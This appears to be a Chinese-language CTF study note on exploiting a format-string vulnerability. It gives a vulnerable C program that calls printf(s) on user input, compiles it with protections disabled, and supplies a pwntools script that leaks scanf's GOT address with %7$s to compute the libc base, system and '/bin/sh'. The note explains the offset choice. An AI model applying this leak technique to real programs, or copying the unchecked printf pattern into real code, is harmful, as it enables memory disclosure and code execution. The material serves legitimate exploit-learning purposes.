#include <stdio.h>
int main() {
char s[100];
scanf("%s", s);
printf(s);
return 0;
}
编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c
泄露的payload先贴出来,再理解
# coding:utf-8
from pwn import*
from LibcSearcher import *
context.log_level = 'debug'
sh = process('./fmt')
elf = ELF('./fmt')
scanf_got_addr = elf.got['__isoc99_scanf']
print(hex(scanf_got_addr))
payload = p32(scanf_got_addr) + '%7$s'
# pause()
sh.sendline(payload)
# 泄露scanf的真实地址
scanf_addr = u32(sh.recv()[4:8])
print hex(scanf_addr)
# libc操作
libc = LibcSearcher('__isoc99_scanf', scanf_addr)
libc_base = scanf_addr - libc.dump('__isoc99_scanf')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
sh.interactive()
gdb断点在printf
理解一下,字符串偏移7,所以payload为got偏移+%7$s,这边用’s而不是’p’,在于got表记录内容也是个指针,%s直接解引用,返回内容:got表偏移+真实地址,所以 u32(sh.recv()[4:8])